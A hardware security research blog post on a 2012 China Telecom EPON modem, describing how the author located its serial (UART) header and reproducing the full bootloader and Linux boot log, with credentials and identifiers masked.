Exploring a China Telecom RG2010-CE EPON CPE
This post explores a 2012 China Telecom RG2010-CE EPON CPE, the main goal of this research is to assess the security of the device. As always sensitive data will not be published.
Introduction
When we lived in Shanghai we had an EPON (Ethernet Passive Optical Network) connection in our appartement, China Telecom used the RG2010-CA OTN as CPE at that time. Several years and a few moves (and a place without EPON connection) later this device was gathering dust so I decided to crack it open. At a recent EPON deployment by China Telecom I noticed they no longer use the RG2010-CA but I’m guessing there might still be lots of units around.
I am going to go through the following steps and see how far we can get:
- Reconnaissance - Use physical access to obtain information
- Gaining Access - Use said information to gain elevated local privileges
- Maintaining Access - Use said information and local privileges to get complete remote access (shell or other code execution)
Reconnaissance
Since I have physical access to the device this will greatly simplify the reconnaissance step. After cracking the case open I have found 3 rows of pin headers; 2 rows of 5 pins and one of 3 pins. Using the scope it is easy enough to find a 3.3V UART (J12) at 115200 baud and get a serial port, I guess the other 5 pin row is for JTAG but I did not connect my J-Link to this to explore this further.
So let’s start with a bootlog to get our bearings:
HELO
CPUI
L1CI
HELO
CPUI
L1CI
DRAM
----
PHYS
ZQDN
PHYE
DINT
LSYN
USYN
MSYN
LMBE
PASS
----
ZBSS
CODE
DATA
L12F
MAIN
CFE version 1.0.37-104.4 for BCM96328 (32bit,SP,BE)
Build Date: Fri Jul 8 11:56:26 CST 2011 (root@localhost.localdomain)
Copyright (C) 2000-2009 Broadcom Corporation.
HS Serial flash device: name S25FL128P, id 0x0118 size 16384KB
Total Flash size: 16384K with 256 sectors
Flash split 25 : AuxFS[4128768]
Blk# BlkOff Blks MemLen Partition Name
0000 001408 0001 0001024 NVRAM
0254 000000 0001 0049152 Factory Data
0253 000000 0001 0049152 Backup PSI
0252 000000 0001 0049152 Syslog
0252 049152 0001 0008192 Scratch PAD
0255 016384 0001 0049152 PSI
0189 000000 0063 4128768 JFFS_AUXFS
Chip ID: BCM6328B0, MIPS: 320MHz, DDR: 320MHz, Bus: 160MHz
Main Thread: TP0
Memory Test Passed
Total Memory: 67108864 bytes (64MB)
Boot Address: 0xb8000000
Board IP address : 192.168.1.1:ffffff00
Host IP address : 192.168.1.100
Gateway IP address :
Run from flash/host (f/h) : f
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel
Boot delay (0-9 seconds) : 1
Boot image (0=latest, 1=previous) : 0
Board Id (0-1) : 999999xxxx
Number of MAC Addresses (1-32) : 11
Base MAC Address : e0:30:05:XX:XX:XX
PSI Size (1-64) KBytes : 48
Enable Backup PSI [0|1] : 1
System Log Size (0-256) KBytes : 48
Flash Block Size (1-256) in KBytes: 64
Auxillary File System Size Percent: 25
Main Thread Number [0|1] : 0
Enable Small IMAGE [0|1] : 0
ProductClass : RG201O-CA
WlSsid : ChinaNet-XXXX
WlKey : XXXXXXXX
UserPass : YYYYY
DeviceId : XXXXXXXXXXXXXXXXX
StartFlag : 1
factoryDate : 1
*** Press any key to stop auto run (1 seconds) ***
Auto run second count down: 0
Booting from previous image (0xb8010000) ...
Code Address: 0x80010000, Entry Address: 0x8024f000
Decompression OK!
Entry at 0x8024f000
Closing network.
Disabling Switch ports.
Flushing Receive Buffers...
0 buffers found.
Closing DMA Channels.
Starting program at 0x8024f000
Linux version 2.6.21.5 (xiesanyuan@localhost.localdomain) (gcc version 4.2.3) #2 Fri Mar 16 16:51:31 CST 2012
HS Serial flash device: name S25FL128P, id 0x0118 size 16384KB
963283avng prom init
Linux TP ID = 0
CPU revision is: 0002a075
Determined physical RAM map:
memory: 03f00000 @ 00000000 (usable)
On node 0 totalpages: 16128
DMA zone: 32 pages used for memmap
DMA zone: 0 pages reserved
DMA zone: 4064 pages, LIFO batch:0
Normal zone: 94 pages used for memmap
Normal zone: 11938 pages, LIFO batch:1
Built 1 zonelists. Total pages: 16002
Kernel command line: root=31:0 ro noinitrd console=ttyS0,115200
brcm mips: enabling icache and dcache...
Primary instruction cache 32kB, physically tagged, 4-way, linesize 16 bytes.
Primary data cache 32kB, 2-way, linesize 16 bytes.
Synthesized TLB refill handler (21 instructions).
Synthesized TLB load handler fastpath (33 instructions).
Synthesized TLB store handler fastpath (33 instructions).
Synthesized TLB modify handler fastpath (32 instructions).
PID hash table entries: 256 (order: 8, 1024 bytes)
Using 160.000 MHz high precision timer.
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Allocating memory for DSP module core and initialization code
Allocated DSP module memory - CORE=0x8108c700 SIZE=1576144, INIT=0x0 SIZE=0
Memory: 59584k/64512k available (1993k kernel code, 4912k reserved, 302k data, 104k init, 0k highmem)
KLOB Pool 1 Initialized: 1048576 bytes <0x80300000 ... 0x80400000>
Calibrating delay loop... 318.46 BogoMIPS (lpj=159232)
Mount-cache hash table entries: 512
NET: Registered protocol family 16
Total Flash size: 16384K with 256 sectors
Flash split 25 : AuxFS[4128768]
Blk# BlkOff Blks MemLen Partition Name
0 1408 1 1024 NVRAM
254 0 1 49152 Factory Data
253 0 1 49152 Backup PSI
252 0 1 49152 Syslog
252 49152 1 8192 Scratch PAD
255 16384 1 49152 PSI
189 0 63 4128768 JFFS_AUXFS
registering PCI controller with io_map_base unset
registering PCI controller with io_map_base unset
PCI: Bridge: 0000:01:00.0
IO window: disabled.
MEM window: disabled.
PREFETCH window: disabled.
PCI: Setting latency timer of device 0000:01:00.0 to 64
BLOG v2.1 Initialized
NET: Registered protocol family 8
NET: Registered protocol family 20
NET: Registered protocol family 2
Time: MIPS clocksource has been installed.
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 2048 (order: 2, 16384 bytes)
TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
TCP: Hash tables configured (established 2048 bind 2048)
TCP reno registered
squashfs: version 3.4 (2008/08/26) Phillip Lougher
squashfs: LZMA suppport for slax.org by jro
JFFS2 version 2.2. (C) 2001-2006 Red Hat, Inc.
fuse init (API version 7.8)
io scheduler noop registered (default)
PPP generic driver version 2.4.2
NET: Registered protocol family 24
bcm963xx_mtd driver v2.0
File system address: 0xb8010100
Registered device mtd[BCM63XX RootFS] dev[0] Flash[0xb8010100,6672384]
Registered device mtd[BCM63XX AuxFS] dev[1] Flash[0xb8bd0000,4128768]
brcmboard: brcm_board_init entry
Serial: BCM63XX driver $Revision: 3.00 $
ttyS0 at MMIO 0xb0000100 (irq = 36) is a BCM63XX
ttyS1 at MMIO 0xb0000120 (irq = 47) is a BCM63XX
Broadcom Logger v0.1 Mar 16 2012 16:48:03
Mirror/redirect action on
u32 classifier
input device check on
Actions configured
TCP cubic registered
NET: Registered protocol family 1
NET: Registered protocol family 10
6WIND/LSIIT IPv6 multicast forwarding 0.1 plus PIM-SM/SSM with *BSD API
NET: Registered protocol family 17
NET: Registered protocol family 15
Initializing MCPD Module
Ebtables v2.0 registered
802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
All bugs added by David S. Miller <davem@redhat.com>
VFS: Mounted root (squashfs filesystem) readonly.
Freeing unused kernel memory: 104k freed
init started: BusyBox v1.00 (2012.03.16-09:02+0000) multi-call binary
mount: Mounting sysfs on /sys failed: No such dev
BusyBox v1.00 (2012.03.16-09:02+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
Loading drivers and kernel modules...
pktflow: module license 'Proprietary' taints kernel.
Broadcom Packet Flow Cache Char Driver v2.2 Jan 12 2012 11:54:05 Registered<242>
NBUFF v1.0 Initialized
Broadcom Packet Flow Cache learning via BLOG enabled.
Created Proc FS /procfs/fcache
Broadcom Packet Flow Cache registered with netdev chain
Constructed Broadcom Packet Flow Cache v2.2 Jan 12 2012 12:05:18
Broadcom BCMPROCFS v1.0 initialized
Broadcom BCM6328B0 Ethernet Network Device v0.1 Mar 16 2012 16:48:55
KLOB extended to 2 pools
KLOB extended to 3 pools
KLOB extended to 4 pools
KLOB extended to 5 pools
KLOB extended to 6 pools
KLOB extended to 7 pools
KLOB extended to 8 pools
dgasp: kerSysRegisterDyingGaspHandler: bcmsw registered
eth0: MAC Address: E0:30:05:XX:XX:XX
eth1: MAC Address: E0:30:05:XX:XX:XX
eth2: MAC Address: E0:30:05:XX:XX:XX
eth3: MAC Address: E0:30:05:XX:XX:XX
eth4: MAC Address: E0:30:05:XX:XX:XX
eth4 Link UP 100 mbps full duplex
DSP Driver: DSP init stub
Endpoint: endpoint_init entry
BOS: Enter bosInit
Enter bosAppInit
Exit bosAppInit
BOS: Exit bosInit
PROV(ts: 3 s 353ms):ALLOC item = 0000 location = 0x813F9F80 size = 40 line = 0
PROV(ts: 3 s 360ms):ALLOC item = 0001 location = 0x813F9F00 size = 40 line = 0
PROV(ts: 3 s 368ms):ALLOC item = 0002 location = 0x813F9E80 size = 40 line = 0
PROV(ts: 3 s 375ms):ALLOC item = 0003 location = 0x813F9E00 size = 40 line = 0
PROV(ts: 3 s 382ms):ALLOC item = 0004 location = 0x813F9D80 size = 40 line = 0
PROV(ts: 3 s 389ms):ALLOC item = 0005 location = 0x813F9D00 size = 40 line = 0
PROV(ts: 3 s 396ms):ALLOC item = 0006 location = 0x813F9C80 size = 40 line = 0
PROV(ts: 3 s 403ms):ALLOC item = 0007 location = 0x813F9C00 size = 40 line = 0
PROV(ts: 3 s 411ms):ALLOC item = 0008 location = 0x813F9B80 size = 40 line = 0
PROV(ts: 3 s 418ms):ALLOC item = 0009 location = 0x813F9B00 size = 40 line = 0
PROV(ts: 3 s 425ms):ALLOC item = 0011 location = 0x813F1380 size = 4 line = 0
PROV(ts: 3 s 432ms):ALLOC item = 0200 location = 0x813E7B80 size = 248 line = 0
PROV(ts: 3 s 439ms):ALLOC item = 0201 location = 0x813E7A80 size = 248 line = 0
PROV(ts: 3 s 447ms):ALLOC item = 0202 location = 0x813E7980 size = 248 line = 0
PROV(ts: 3 s 454ms):ALLOC item = 0203 location = 0x813E7880 size = 248 line = 0
PROV(ts: 3 s 461ms):ALLOC item = 0204 location = 0x813E7780 size = 248 line = 0
PROV(ts: 3 s 468ms):ALLOC item = 0205 location = 0x813E7680 size = 248 line = 0
PROV(ts: 3 s 476ms):ALLOC item = 0206 location = 0x813E7580 size = 248 line = 0
PROV(ts: 3 s 483ms):ALLOC item = 0207 location = 0x813E7480 size = 248 line = 0
PROV(ts: 3 s 490ms):ALLOC item = 0208 location = 0x813E7380 size = 248 line = 0
PROV(ts: 3 s 497ms):ALLOC item = 0209 location = 0x813E7280 size = 248 line = 0
PROV(ts: 3 s 505ms):ALLOC item = 0210 location = 0x813E7180 size = 248 line = 0
PROV(ts: 3 s 512ms):ALLOC item = 0211 location = 0x813E7080 size = 248 line = 0
PROV(ts: 3 s 519ms):ALLOC item = 0212 location = 0x83933E80 size = 248 line = 0
PROV(ts: 3 s 526ms):ALLOC item = 0217 location = 0x83933D80 size = 248 line = 0
PROV(ts: 3 s 534ms):ALLOC item = 0218 location = 0x83933C80 size = 248 line = 0
PROV(ts: 3 s 541ms):ALLOC item = 0219 location = 0x83933B80 size = 248 line = 0
PROV(ts: 3 s 548ms):ALLOC item = 0220 location = 0x83933A80 size = 248 line = 0
PROV(ts: 3 s 555ms):ALLOC item = 0221 location = 0x83933980 size = 248 line = 0
PROV(ts: 3 s 563ms):ALLOC item = 0222 location = 0x83933880 size = 248 line = 0
PROV(ts: 3 s 570ms):ALLOC item = 0223 location = 0x83933780 size = 248 line = 0
PROV(ts: 3 s 577ms):ALLOC item = 0224 location = 0x83933680 size = 248 line = 0
PROV(ts: 3 s 584ms):ALLOC item = 0400 location = 0x813F1300 size = 4 line = 0
PROV(ts: 3 s 592ms):ALLOC item = 0401 location = 0x813F1280 size = 4 line = 0
PROV(ts: 3 s 599ms):ALLOC item = 0402 location = 0x813F1200 size = 4 line = 0
PROV(ts: 3 s 606ms):ALLOC item = 0403 location = 0x813F1180 size = 4 line = 0
PROV(ts: 3 s 613ms):ALLOC item = 0404 location = 0x813F1100 size = 4 line = 0
PROV(ts: 3 s 620ms):ALLOC item = 0405 location = 0x8348EF80 size = 4 line = 0
PROV(ts: 3 s 627ms):ALLOC item = 0406 location = 0x8348EF00 size = 4 line = 0
PROV(ts: 3 s 634ms):ALLOC item = 0407 location = 0x8348EE80 size = 4 line = 0
PROV(ts: 3 s 641ms):ALLOC item = 0408 location = 0x8348EE00 size = 4 line = 0
PROV(ts: 3 s 648ms):ALLOC item = 0409 location = 0x8348ED80 size = 4 line = 0
PROV(ts: 3 s 655ms):ALLOC item = 0410 location = 0x8348ED00 size = 4 line = 0
PROV(ts: 3 s 662ms):ALLOC item = 0411 location = 0x8348EC80 size = 4 line = 0
PROV(ts: 3 s 669ms):ALLOC item = 0412 location = 0x8348EC00 size = 4 line = 0
PROV(ts: 3 s 676ms):ALLOC item = 0413 location = 0x8348EB80 size = 4 line = 0
PROV(ts: 3 s 684ms):ALLOC item = 0414 location = 0x8348EB00 size = 4 line = 0
PROV(ts: 3 s 691ms):ALLOC item = 0415 location = 0x8348EA80 size = 4 line = 0
PROV(ts: 3 s 698ms):ALLOC item = 0425 location = 0x8348EA00 size = 4 line = 0
PROV(ts: 3 s 705ms):ALLOC item = 0426 location = 0x8348E980 size = 4 line = 0
PROV(ts: 3 s 712ms):ALLOC item = 0416 location = 0x8348E900 size = 4 line = 0
PROV(ts: 3 s 719ms):ALLOC item = 0418 location = 0x8348E880 size = 4 line = 0
PROV(ts: 3 s 726ms):ALLOC item = 0419 location = 0x8348E800 size = 4 line = 0
PROV(ts: 3 s 733ms):ALLOC item = 0420 location = 0x8348E780 size = 4 line = 0
PROV(ts: 3 s 740ms):ALLOC item = 0600 location = 0x8348E700 size = 4 line = 0
PROV(ts: 3 s 747ms):ALLOC item = 0608 location = 0x8348E680 size = 4 line = 0
PROV(ts: 3 s 754ms):ALLOC item = 0609 location = 0x8348E600 size = 4 line = 0
PROV(ts: 3 s 761ms):ALLOC item = 0610 location = 0x8348E580 size = 4 line = 0
PROV(ts: 3 s 769ms):ALLOC item = 0611 location = 0x8348E500 size = 4 line = 0
PROV(ts: 3 s 776ms):ALLOC item = 0612 location = 0x8348E480 size = 4 line = 0
PROV(ts: 3 s 783ms):ALLOC item = 0613 location = 0x8348E400 size = 4 line = 0
PROV(ts: 3 s 790ms):ALLOC item = 0617 location = 0x8348E380 size = 4 line = 0
PROV(ts: 3 s 797ms):ALLOC item = 0618 location = 0x8348E300 size = 4 line = 0
PROV(ts: 3 s 804ms):ALLOC item = 0619 location = 0x8348E280 size = 4 line = 0
PROV(ts: 3 s 811ms):ALLOC item = 0620 location = 0x8348E200 size = 4 line = 0
PROV(ts: 3 s 818ms):ALLOC item = 2000 location = 0x8348E180 size = 4 line = 0
PROV(ts: 3 s 825ms):ALLOC item = 0805 location = 0x8348E100 size = 4 line = 0
PROV(ts: 3 s 832ms):ALLOC item = 2200 location = 0x83932F80 size = 4 line = 0
PROV(ts: 3 s 839ms):ALLOC item = 2201 location = 0x83932F00 size = 4 line = 0
PROV(ts: 3 s 846ms):ALLOC item = 2202 location = 0x83932E80 size = 4 line = 0
PROV(ts: 3 s 853ms):ALLOC item = 2203 location = 0x83932E00 size = 4 line = 0
PROV(ts: 3 s 861ms):ALLOC item = 0616 location = 0x83932D80 size = 4 line = 0
PROV(ts: 3 s 868ms):ALLOC item = 2204 location = 0x83932D00 size = 4 line = 0
PROV(ts: 3 s 875ms):ALLOC item = 2600 location = 0x83932C80 size = 4 line = 0
PROV(ts: 3 s 882ms):ALLOC item = 2601 location = 0x83932C00 size = 4 line = 0
PROV(ts: 3 s 889ms):ALLOC item = 2602 location = 0x83932B80 size = 4 line = 0
PROV(ts: 3 s 896ms):ALLOC item = 2603 location = 0x83932B00 size = 4 line = 0
PROV(ts: 3 s 903ms):ALLOC item = 2604 location = 0x83932A80 size = 4 line = 0
PROV(ts: 3 s 910ms):ALLOC item = 2605 location = 0x83932A00 size = 4 line = 0
PROV(ts: 3 s 917ms):ALLOC item = 2606 location = 0x83932980 size = 4 line = 0
PROV(ts: 3 s 924ms):ALLOC item = 2800 location = 0x83932900 size = 4 line = 0
PROV(ts: 3 s 931ms):ALLOC item = 2801 location = 0x83932880 size = 4 line = 0
PROV(ts: 3 s 938ms):ALLOC item = 2802 location = 0x81355C00 size = 1024 line = 0
PROV(ts: 3 s 946ms):ALLOC item = 2803 location = 0x83932800 size = 4 line = 0
PROV(ts: 3 s 953ms):ALLOC item = 0430 location = 0x83932780 size = 4 line = 0
PROV(ts: 3 s 960ms):ALLOC item = 0431 location = 0x83932700 size = 4 line = 0
PROV(ts: 3 s 967ms):ALLOC item = 0432 location = 0x83932680 size = 4 line = 0
PROV(ts: 3 s 974ms):ALLOC item = 0417 location = 0x83932600 size = 4 line = 0
PROV(ts: 3 s 981ms):ALLOC item = 0429 location = 0x83932580 size = 4 line = 0
PROV(ts: 3 s 988ms):ALLOC item = 2804 location = 0x83932500 size = 4 line = 0
PROV(ts: 3 s 995ms):ALLOC item = 0000 location = 0x813F9A80 size = 40 line = 1
PROV(ts: 4 s 2 ms):ALLOC item = 0001 location = 0x813F9A00 size = 40 line = 1
PROV(ts: 4 s 10 ms):ALLOC item = 0002 location = 0x813F9980 size = 40 line = 1
PROV(ts: 4 s 17 ms):ALLOC item = 0003 location = 0x813F9900 size = 40 line = 1
PROV(ts: 4 s 24 ms):ALLOC item = 0004 location = 0x83931F80 size = 40 line = 1
PROV(ts: 4 s 31 ms):ALLOC item = 0005 location = 0x83931F00 size = 40 line = 1
PROV(ts: 4 s 38 ms):ALLOC item = 0006 location = 0x83931E80 size = 40 line = 1
PROV(ts: 4 s 45 ms):ALLOC item = 0007 location = 0x83931E00 size = 40 line = 1
PROV(ts: 4 s 53 ms):ALLOC item = 0008 location = 0x83931D80 size = 40 line = 1
PROV(ts: 4 s 60 ms):ALLOC item = 0009 location = 0x83931D00 size = 40 line = 1
PROV(ts: 4 s 67 ms):ALLOC item = 0011 location = 0x83932480 size = 4 line = 1
PROV(ts: 4 s 74 ms):ALLOC item = 0200 location = 0x83933580 size = 248 line = 1
PROV(ts: 4 s 81 ms):ALLOC item = 0201 location = 0x83933480 size = 248 line = 1
PROV(ts: 4 s 89 ms):ALLOC item = 0202 location = 0x83933380 size = 248 line = 1
PROV(ts: 4 s 96 ms):ALLOC item = 0203 location = 0x83933280 size = 248 line = 1
PROV(ts: 4 s 103ms):ALLOC item = 0204 location = 0x83933180 size = 248 line = 1
PROV(ts: 4 s 110ms):ALLOC item = 0205 location = 0x83933080 size = 248 line = 1
PROV(ts: 4 s 118ms):ALLOC item = 0206 location = 0x83930E80 size = 248 line = 1
PROV(ts: 4 s 125ms):ALLOC item = 0207 location = 0x83930D80 size = 248 line = 1
PROV(ts: 4 s 132ms):ALLOC item = 0208 location = 0x83930C80 size = 248 line = 1
PROV(ts: 4 s 139ms):ALLOC item = 0209 location = 0x83930B80 size = 248 line = 1
PROV(ts: 4 s 147ms):ALLOC item = 0210 location = 0x83930A80 size = 248 line = 1
PROV(ts: 4 s 154ms):ALLOC item = 0211 location = 0x83930980 size = 248 line = 1
PROV(ts: 4 s 161ms):ALLOC item = 0212 location = 0x83930880 size = 248 line = 1
PROV(ts: 4 s 168ms):ALLOC item = 0217 location = 0x83930780 size = 248 line = 1
PROV(ts: 4 s 176ms):ALLOC item = 0218 location = 0x83930680 size = 248 line = 1
PROV(ts: 4 s 183ms):ALLOC item = 0219 location = 0x83930580 size = 248 line = 1
PROV(ts: 4 s 190ms):ALLOC item = 0220 location = 0x83930480 size = 248 line = 1
PROV(ts: 4 s 197ms):ALLOC item = 0221 location = 0x83930380 size = 248 line = 1
PROV(ts: 4 s 205ms):ALLOC item = 0222 location = 0x83930280 size = 248 line = 1
PROV(ts: 4 s 212ms):ALLOC item = 0223 location = 0x83930180 size = 248 line = 1
PROV(ts: 4 s 219ms):ALLOC item = 0224 location = 0x83930080 size = 248 line = 1
PROV(ts: 4 s 226ms):ALLOC item = 0400 location = 0x83932400 size = 4 line = 1
PROV(ts: 4 s 234ms):ALLOC item = 0401 location = 0x83932380 size = 4 line = 1
PROV(ts: 4 s 241ms):ALLOC item = 0402 location = 0x83932300 size = 4 line = 1
PROV(ts: 4 s 248ms):ALLOC item = 0403 location = 0x83932280 size = 4 line = 1
PROV(ts: 4 s 255ms):ALLOC item = 0404 location = 0x83932200 size = 4 line = 1
PROV(ts: 4 s 262ms):ALLOC item = 0405 location = 0x83932180 size = 4 line = 1
PROV(ts: 4 s 269ms):ALLOC item = 0406 location = 0x83932100 size = 4 line = 1
PROV(ts: 4 s 276ms):ALLOC item = 0407 location = 0x8392FF80 size = 4 line = 1
PROV(ts: 4 s 283ms):ALLOC item = 0408 location = 0x8392FF00 size = 4 line = 1
PROV(ts: 4 s 290ms):ALLOC item = 0409 location = 0x8392FE80 size = 4 line = 1
PROV(ts: 4 s 297ms):ALLOC item = 0410 location = 0x8392FE00 size = 4 line = 1
PROV(ts: 4 s 304ms):ALLOC item = 0411 location = 0x8392FD80 size = 4 line = 1
PROV(ts: 4 s 311ms):ALLOC item = 0412 location = 0x8392FD00 size = 4 line = 1
PROV(ts: 4 s 318ms):ALLOC item = 0413 location = 0x8392FC80 size = 4 line = 1
PROV(ts: 4 s 326ms):ALLOC item = 0414 location = 0x8392FC00 size = 4 line = 1
PROV(ts: 4 s 333ms):ALLOC item = 0415 location = 0x8392FB80 size = 4 line = 1
PROV(ts: 4 s 340ms):ALLOC item = 0425 location = 0x8392FB00 size = 4 line = 1
PROV(ts: 4 s 347ms):ALLOC item = 0426 location = 0x8392FA80 size = 4 line = 1
PROV(ts: 4 s 354ms):ALLOC item = 0416 location = 0x8392FA00 size = 4 line = 1
PROV(ts: 4 s 361ms):ALLOC item = 0418 location = 0x8392F980 size = 4 line = 1
PROV(ts: 4 s 368ms):ALLOC item = 0419 location = 0x8392F900 size = 4 line = 1
PROV(ts: 4 s 375ms):ALLOC item = 0420 location = 0x8392F880 size = 4 line = 1
PROV(ts: 4 s 382ms):ALLOC item = 0600 location = 0x8392F800 size = 4 line = 1
PROV(ts: 4 s 389ms):ALLOC item = 0608 location = 0x8392F780 size = 4 line = 1
PROV(ts: 4 s 396ms):ALLOC item = 0609 location = 0x8392F700 size = 4 line = 1
PROV(ts: 4 s 403ms):ALLOC item = 0610 location = 0x8392F680 size = 4 line = 1
PROV(ts: 4 s 410ms):ALLOC item = 0611 location = 0x8392F600 size = 4 line = 1
PROV(ts: 4 s 418ms):ALLOC item = 0612 location = 0x8392F580 size = 4 line = 1
PROV(ts: 4 s 425ms):ALLOC item = 0613 location = 0x8392F500 size = 4 line = 1
PROV(ts: 4 s 432ms):ALLOC item = 0617 location = 0x8392F480 size = 4 line = 1
PROV(ts: 4 s 439ms):ALLOC item = 0618 location = 0x8392F400 size = 4 line = 1
PROV(ts: 4 s 446ms):ALLOC item = 0619 location = 0x8392F380 size = 4 line = 1
PROV(ts: 4 s 453ms):ALLOC item = 0620 location = 0x8392F300 size = 4 line = 1
PROV(ts: 4 s 460ms):ALLOC item = 2000 location = 0x8392F280 size = 4 line = 1
PROV(ts: 4 s 467ms):ALLOC item = 0805 location = 0x8392F200 size = 4 line = 1
PROV(ts: 4 s 474ms):ALLOC item = 2200 location = 0x8392F180 size = 4 line = 1
PROV(ts: 4 s 481ms):ALLOC item = 2201 location = 0x8392F100 size = 4 line = 1
PROV(ts: 4 s 488ms):ALLOC item = 2202 location = 0x8392EF80 size = 4 line = 1
PROV(ts: 4 s 495ms):ALLOC item = 2203 location = 0x8392EF00 size = 4 line = 1
PROV(ts: 4 s 503ms):ALLOC item = 0616 location = 0x8392EE80 size = 4 line = 1
PROV(ts: 4 s 510ms):ALLOC item = 2204 location = 0x8392EE00 size = 4 line = 1
PROV(ts: 4 s 517ms):ALLOC item = 2600 location = 0x8392ED80 size = 4 line = 1
PROV(ts: 4 s 524ms):ALLOC item = 2601 location = 0x8392ED00 size = 4 line = 1
PROV(ts: 4 s 531ms):ALLOC item = 2602 location = 0x8392EC80 size = 4 line = 1
PROV(ts: 4 s 538ms):ALLOC item = 2603 location = 0x8392EC00 size = 4 line = 1
PROV(ts: 4 s 545ms):ALLOC item = 2604 location = 0x8392EB80 size = 4 line = 1
PROV(ts: 4 s 552ms):ALLOC item = 2605 location = 0x8392EB00 size = 4 line = 1
PROV(ts: 4 s 559ms):ALLOC item = 2606 location = 0x8392EA80 size = 4 line = 1
PROV(ts: 4 s 566ms):ALLOC item = 2800 location = 0x8392EA00 size = 4 line = 1
PROV(ts: 4 s 573ms):ALLOC item = 2801 location = 0x8392E980 size = 4 line = 1
PROV(ts: 4 s 580ms):ALLOC item = 2802 location = 0x81355800 size = 1024 line = 1
PROV(ts: 4 s 588ms):ALLOC item = 2803 location = 0x8392E900 size = 4 line = 1
PROV(ts: 4 s 595ms):ALLOC item = 0430 location = 0x8392E880 size = 4 line = 1
PROV(ts: 4 s 602ms):ALLOC item = 0431 location = 0x8392E800 size = 4 line = 1
PROV(ts: 4 s 609ms):ALLOC item = 0432 location = 0x8392E780 size = 4 line = 1
PROV(ts: 4 s 616ms):ALLOC item = 0417 location = 0x8392E700 size = 4 line = 1
PROV(ts: 4 s 623ms):ALLOC item = 0429 location = 0x8392E680 size = 4 line = 1
PROV(ts: 4 s 630ms):ALLOC item = 2804 location = 0x8392E600 size = 4 line = 1
PROV(ts: 4 s 637ms):Allocated memory = 13728
PCM: Interrupt Masks
---------------
IrqMask = 0x0000000311001000
IrqMask1 = 0x0000000000000000
PCM_IUDMA->ctrl[0].intMask = 0x00000000
PCM_IUDMA->ctrl[1].intMask = 0x00000000
PCM: Interrupt Status
-----------------
IrqStatus = 0x000000000001E000
IrqStatus1 = 0x000000000001E000
PCM_IUDMA->ctrl[0].intStat = 0x00000000
PCM_IUDMA->ctrl[1].intStat = 0x00000000
PCM->pcm_pll_ctrl1 = 0xDC80147D
PCM->pcm_pll_ctrl2 = 0xD0000000
PCM->pcm_pll_ctrl3 = 0x38000700
PCM->pcm_pll_ctrl4 = 0x00000015
PCM->pcm_int_pending = 0xA0000000
PCM->pcm_int_mask = 0x00000000
PCM->pcm_ctrl = 0x00000000
PCM->pcm_chan_ctrl = 0x00000000
PCM_IUDMA->regs.ctrlConfig = 0x00000001
PCM_IUDMA->ctrl[0].maxBurst = 0x00000008
PCM_IUDMA->ctrl[0].config = 0x00000000
PCM_IUDMA->stram[0].baseDescPointer = 0xF6516A8E
PCM_IUDMA->stram[0].stateBytesDoneRingOffset = 0x62000BA2
PCM_IUDMA->stram[0].flagsLengthStatus = 0xDF291B83
PCM_IUDMA->stram[0].currentBufferPointer = 0x63788848
PCM_IUDMA->ctrl[1].maxBurst = 0x00000008
PCM_IUDMA->ctrl[1].config = 0x00000000
PCM_IUDMA->stram[1].baseDescPointer = 0x9F50010F
PCM_IUDMA->stram[1].stateBytesDoneRingOffset = 0x7A7901F9
PCM_IUDMA->stram[1].flagsLengthStatus = 0xFC30132C
PCM_IUDMA->stram[1].currentBufferPointer = 0x9436ACA9
PLL init completed. PLL registers set to:
PCM->pcm_pll_ctrl1 = 0x0080147D
PCM->pcm_pll_ctrl2 = 0xD0000000
PCM->pcm_pll_ctrl3 = 0x38000700
PCM->pcm_pll_ctrl4 = 0x00000015
Set up PCM registers
XDRV:pcm6328_timeslotAlloc 0xB000A040: 0x80000000
Channel 0 assigned to timeslot 0
XDRV:pcm6328_timeslotAlloc 0xB000A044: 0x90000000
Channel 1 assigned to timeslot 8
XDRV:pcm6328_timeslotAlloc 0xB000A040: 0x8A000000
Channel 2 assigned to timeslot 1
XDRV:pcm6328_timeslotAlloc 0xB000A044: 0x9B000000
Channel 3 assigned to timeslot 9
rxDescriptorArea = 24
txDescriptorArea = 24
Unaligned dmaRxDesc_c = 0xA0268000
Unaligned dmaTxDesc_c = 0xA024F000
rxBufferArea = 1312
txBufferArea = 1312
Unaligned dmaRxData = 0xA02BD000
Unaligned dmaTxData = 0xA02BE000
Aligned Tx Desc (0xA024F000): chan 0, buf 0, sts 0xe000, len 640, bufp 0x2be000
Aligned Tx Desc (0xA024F008): chan 0, buf 1, sts 0x7000, len 640, bufp 0x2be290
Aligned Rx Desc (0xA0268000): chan 0, buf 0, sts 0x8000, len 640, bufp 0x2bd000
Aligned Rx Desc (0xA0268008): chan 0, buf 1, sts 0x9000, len 640, bufp 0x2bd290
initIudma: chan 0, descBase 0xa0268000, descBaseIudma 0x268000
initIudma: chan 1, descBase 0xa024f000, descBaseIudma 0x24f000
MSPI INITIALIZED
Endpoint: endpoint_init COMPLETED
Lightbox, debug:register with led manager
max_dgram_qlen is changed from 10
to 100
pc Compile Time: Mar 16 2012 16:54:36
main, close unneed files
Jan 1 00:00:06 pc:
[comm_start:76] Warning, Using linux socket Default SO_RCVBUF!!!!!!
Jan 1 00:00:06 pc: [comm_start:84] expected value(0K), actual value(114K)
main, pc_server_fd 3.
main, enter loop .
Initializing signal_handler
apps capture_main
apps probe_main
apps signalkill_main
apps arp_main
apps dnsprobe_main
apps getversion_main
match apps: getversion_main
can not open dev miscchar
MISC_getCPLDReg fail.
can not open dev miscchar
MISC_getCPLDReg fail.
can not open dev miscchar
MISC_getCPLDReg fail.
can not open dev miscchar
VTP Compile Time: Mar 16 2012 16:54:24
Jan 1 00:00:06 logic:
[comm_start:82] Warning, linux socket SO_RCVBUF maybe overflow!!!!!!
please set /proc/sys/net/core/rmem_max.
Jan 1 00:00:06 logic: [comm_start:84] expected value(512K), actual value(228K)
Jan 1 00:00:06 logic:
[lcomm_start:207] Warning, linux socket SO_RCVBUF maybe overflow!!!!!!
please set /proc/sys/net/core/rmem_max.
Jan 1 00:00:06 logic: [lcomm_start:209] expected value(512K), actual value(228K)
